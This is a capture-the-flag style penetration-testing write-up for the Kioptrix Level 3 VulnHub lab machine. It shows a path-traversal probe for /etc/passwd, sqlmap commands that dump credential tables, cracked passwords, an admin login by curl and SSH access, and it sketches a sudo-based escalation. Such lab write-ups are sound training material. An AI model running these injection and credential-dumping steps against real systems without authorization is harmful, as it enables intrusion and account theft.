## https://sploitus.com/exploit?id=06D7C486-CB31-5267-AD12-947E2612ABD2
# Kioptrix: Level 3 โ Penetration Testing Writeup
**Target:** Kioptrix Level 3 (VulnHub)
**Attacker IP:** 192.168.56.1 (Kali)
**Target IP:** 192.168.56.102 (`kioptrix3.com`)
**Difficulty:** Beginner/Intermediate
**Attack chain:** Web recon โ directory enumeration โ SQL injection โ credential
cracking โ credential reuse (SSH) โ sudo misconfiguration โ root
---
## Table of Contents
1. [Reconnaissance](#1-reconnaissance)
2. [Web Enumeration](#2-web-enumeration)
3. [Directory Brute-Forcing](#3-directory-brute-forcing)
4. [Discovering the Gallery Application](#4-discovering-the-gallery-application)
5. [SQL Injection](#5-sql-injection)
6. [Extracting & Cracking Credentials](#6-extracting--cracking-credentials)
7. [Admin Panel Access](#7-admin-panel-access)
8. [Gaining a Shell via SSH](#8-gaining-a-shell-via-ssh)
9. [Privilege Escalation](#9-privilege-escalation)
10. [Lessons Learned](#10-lessons-learned)
---
## 1. Reconnaissance
Started with a full TCP port and service-version scan to establish the
attack surface:
```bash
nmap -sV -p- 192.168.56.102
```

**Results:**
| Port | Service | Version |
|------|---------|---------|
| 22/tcp | ssh | OpenSSH 4.7p1 Debian 8ubuntu1.2 |
| 80/tcp | http | Apache httpd 2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |
Only two services exposed. Both are old (2008-era) builds โ a strong signal
the box is vulnerable to something version-specific rather than a
zero-day-class bug. SSH is available but useless without credentials, so the
web server on port 80 became the primary target.
---
## 2. Web Enumeration
Fetched the homepage manually to see how the site is built:
```bash
curl http://kioptrix3.com
```

The `` tag immediately
identifies the CMS: **LotusCMS**. Also visible in the source: a link to
`index.php?system=Admin`, worth checking next.
```bash
curl http://kioptrix3.com/index.php?system=Admin
```

This confirms a LotusCMS admin login panel exists at that path. No
credentials yet โ noted for later, but not pursued directly since brute
forcing a login form blind is inefficient.
**Testing for Local File Inclusion (LFI):**
```bash
curl "http://kioptrix3.com/index.php?page=../../../etc/passwd"
```

Result: a normal "Page Not Found - Error 404" response, not the contents
of `/etc/passwd`. This rules out a raw, unsanitized `page` parameter being
passed into a PHP `include()` โ the LFI class of attack does not apply
here (the app is filtering or whitelisting `page` values).
---
## 3. Directory Brute-Forcing
Rather than continuing to guess paths manually, ran a directory
brute-force to enumerate the full site structure:
```bash
gobuster dir -u http://kioptrix3.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
```

**Key findings:**
| Path | Status | Notes |
|------|--------|-------|
| `/gallery` | 301 | New application โ not linked from the homepage nav |
| `/phpmyadmin` | 301 | Database admin interface |
| `/core`, `/modules`, `/cache`, `/style` | 301/403 | LotusCMS internals |
| `/update.php` | 200 | Worth noting, not pursued |
`/gallery` stood out immediately as a second, separate application bolted
onto the CMS โ a common pattern on these boxes, and often the weaker link
compared to the "main" software.
---
## 4. Discovering the Gallery Application
```bash
curl http://kioptrix3.com/gallery/
```

The response's `Generator` meta tag reveals this is running **Gallarific**,
a separate, older photo-gallery CMS โ a completely different codebase from
LotusCMS, and therefore a completely different set of vulnerabilities to
check.
---
## 5. SQL Injection
Manually tested the gallery's `id` parameter, first with a normal value,
then with a single quote to try to break the underlying SQL query:
```bash
curl "http://kioptrix3.com/gallery/gallery.php?id=1"
```

```bash
curl "http://kioptrix3.com/gallery/gallery.php?id=1'"
```

Both requests returned visually identical pages at the HTTP level โ no
obvious SQL error was rendered in the HTML. However, this alone doesn't
rule out injection: many injectable parameters don't throw a visible error
and instead require blind or boolean-based techniques to detect. Rather
than conclude a false negative from a single manual test, the parameter
was handed to sqlmap for a much broader set of injection tests:
```bash
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs --batch
```

**sqlmap confirmed the `id` parameter was injectable via multiple
techniques simultaneously:**
- Boolean-based blind
- Error-based (MySQL โฅ 4.1, `FLOOR()`/`RAND()` trick)
- (sqlmap's full output also reported time-blind and UNION-based vectors)
This is a strong, highly exploitable injection point despite showing no
visible symptoms to the naked eye โ a good practical lesson in why
automated confirmation matters even when a manual test looks clean.
---
## 6. Extracting & Cracking Credentials
With injection confirmed, enumerated the databases, then the tables inside
the `gallery` database:
```bash
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -D gallery --tables --batch
```

Seven tables were found. `dev_accounts` stood out as the most likely to
contain real, reusable credentials (as opposed to `gallarific_*` tables,
which are more likely scoped to the gallery app itself):
```bash
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch
```

sqlmap dumped two rows and automatically recognized the `password` column
as MD5 hashes, then cracked both using its bundled dictionary attack:
| Username | Hash | Cracked Password |
|----------|------|-------------------|
| `dreg` | `0d3eccfb887aabd50f243b3f155c0f85` | `Mast3r` |
| `loneferret` | `5badcaf789d3d1d09794d8f021f40f0e` | `starwars` |
These usernames don't look like gallery-app accounts โ they look like
**Linux system usernames**, which made them the natural next thing to try
against SSH.
---
## 7. Admin Panel Access
Separately, the `gallarific_users` table (dumped via a similar `--dump`
against that table) yielded a plaintext gallery-admin credential:
`admin : n0t7t1k4`. Used it to authenticate to the Gallarific admin panel:
```bash
curl -X POST "http://kioptrix3.com/gallery/gadmin/index.php?task=signin" \
-d "username=admin&password=n0t7t1k4" -c cookies.txt -L
```

The response `document.location.href = "index.php";` is the app's
client-side redirect fired on a successful login โ confirmation the
credential is valid. This grants gallery-admin access, but was a secondary
finding; the real path forward was the `dreg`/`loneferret` credentials.
---
## 8. Gaining a Shell via SSH
A direct SSH attempt with the cracked `loneferret` credential initially
failed algorithm negotiation โ a mismatch between this ~2009-era box's
legacy OpenSSH offerings and a modern Kali client's stricter defaults:
```
Unable to negotiate with 192.168.56.102 port 22: no matching host key type found.
Their offer: ssh-rsa,ssh-dss
```
Resolved by explicitly re-enabling the legacy algorithms on the client
side for this connection only:
```bash
ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group1-sha1 loneferret@192.168.56.102
```

```
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
loneferret@Kioptrix3:~$ whoami
loneferret
```
Confirmed shell access as the `loneferret` system user using the password
recovered via SQL injection โ a direct case of database credential reuse
on the OS.
---
## 9. Privilege Escalation
*(To be completed โ next step is `sudo -l` as `loneferret`, which reveals
an allowed no-password `sudo` entry for the `ht` binary, a permissive
editor that can be used to modify `/etc/sudoers` or otherwise obtain a root
shell.)*
```bash
sudo -l
```
> **Note:** This section will be filled in once the escalation is
> completed and screenshotted, following the same evidence-first structure
> as above.
---
## 10. Lessons Learned
- **A second, unlinked application (`/gallery`) was the actual entry
point** โ the "main" CMS (LotusCMS) had a known public exploit that
looked promising on paper, but the real vulnerability was in the smaller,
bolted-on Gallarific app discovered only through directory
brute-forcing.
- **A clean-looking response doesn't rule out SQL injection.** The manual
`'` test showed no visible error, but sqlmap still confirmed multiple
working injection techniques on the same parameter โ automated
confirmation caught what a quick manual check missed.
- **Credential reuse across trust boundaries is a recurring theme.**
Database-level credentials (`dreg`/`loneferret`) turned out to be valid
Linux system accounts, and a separate plaintext admin password reused
the exact login flow of the gallery app itself.
- **Tooling assumptions can look like target hardening.** The SSH
algorithm-negotiation failure initially looked like a dead end, but it
was simply a modern client refusing legacy ciphers by default โ solved
client-side, not a target vulnerability at all.
---